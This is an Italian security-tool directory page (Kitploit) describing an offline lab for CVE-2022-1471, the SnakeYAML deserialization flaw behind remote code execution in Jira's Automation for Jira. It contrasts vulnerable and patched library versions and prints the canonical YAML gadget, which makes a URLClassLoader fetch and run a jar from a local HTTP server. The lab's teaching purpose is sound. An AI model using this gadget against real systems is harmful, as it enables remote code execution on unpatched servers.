Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
cve-2022-1471-jira-lab — Laboratorio offline CVE-2022-1471: deserializzazione non sicura di SnakeYAML verso RCE; confronta la versione vulnerabile 1.x con la versione corretta 2.x utilizzando un payload locale innocuo. | Kitploit
Strumenti/GitHubGitHub/aykhan019/cve-2022-1471-jira-lab
Analisi delle VulnerabilitàExploitApprendimento e FormazioneLab e Pratica
GitHubaykhan019/cve-2022-1471-jira-lab

cve-2022-1471-jira-lab

Laboratorio offline CVE-2022-1471: deserializzazione non sicura di SnakeYAML verso RCE; confronta la versione vulnerabile 1.x con la versione corretta 2.x utilizzando un payload locale innocuo.

Vedi Repository
126 giorni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2022-1471 — Lab RCE SnakeYAML (contesto Jira / Automation for Jira)

Lab offline e autonomo che dimostra il meccanismo alla base di CVE-2022-1471 (deserializzazione non sicura SnakeYAML → RCE, CVSS 9.8), come sfruttato nel finding su Jira / Jira Service Management contro un host con 9.4.9 (range affetto 9.4.0–9.4.12, corretto in 9.4.14 — vedi Atlassian JSDSERVER-14906).

Il lab dimostra esattamente due cose:

  1. SnakeYAML 1.31 (la linea 1.x che Jira 9.4.9 include nell'app Automation for Jira in bundle) esegue il gadget canonico durante il parsing YAML — il codice viene eseguito, viene scritto un file marcatore.
  2. SnakeYAML 2.2 (la linea inclusa dal fix 9.4.14+) rifiuta lo stesso payload (ConstructorException) — non viene eseguito nulla.

Non sfrutta alcun host reale. Tutto viene eseguito su 127.0.0.1; il payload (src/Exploit.java) è innocuo — il suo inizializzatore statico scrive un solo file di testo e nient'altro.

Esecuzione

root@kitploit:~
./run.sh
cat PWNED-proof.txt   # prova su disco dell'esecuzione (rigenerata a ogni run)

Richiede un JDK 17+ nel PATH (javac, java, jar). Se esiste un JDK incluso sotto tools/, viene usato quello. L'unico traffico di rete è un server HTTP locale su 127.0.0.1:8077 che serve il jar del payload, terminato all'uscita.

Come funziona

src/VulnDemo.java è un semplice new Yaml().load(yaml) — la stessa chiamata non sicura che le versioni vulnerabili di Automation for Jira eseguono sulle regole YAML importate. Lo YAML dell'attaccante è il gadget canonico:

root@kitploit:~
!!javax.script.ScriptEngineManager [
  !!java.net.URLClassLoader [[
    !!java.net.URL ["http://127.0.0.1:8077/payload.jar"]
  ]]
]

SnakeYAML 1.x istanzia classi arbitrarie senza allowlist → la JVM recupera e carica una classe dal server "attaccante" → il suo inizializzatore statico viene eseguito. SnakeYAML 2.x usa di default SafeConstructor, che rifiuta il tag globale.

sample-output-PWNED-proof.txt mostra il contenuto del file marcatore da un'esecuzione; screenshots/ mostra entrambe le esecuzioni (vulnerabile vs corretta).

Ambito / disclaimer

Ricerca di sicurezza autorizzata. Dimostrazione del meccanismo della libreria e del confine del fix — non un exploit contro alcun sistema di produzione. Sfruttare il vettore Jira richiede inoltre l'importazione autenticata (admin Jira) di una regola di automazione.

Riferimenti

  • NVD — CVE-2022-1471
  • FAQ Atlassian per CVE-2022-1471
  • Atlassian JSDSERVER-14906
  • Segnalazione SnakeYAML #561
Scarica lo strumento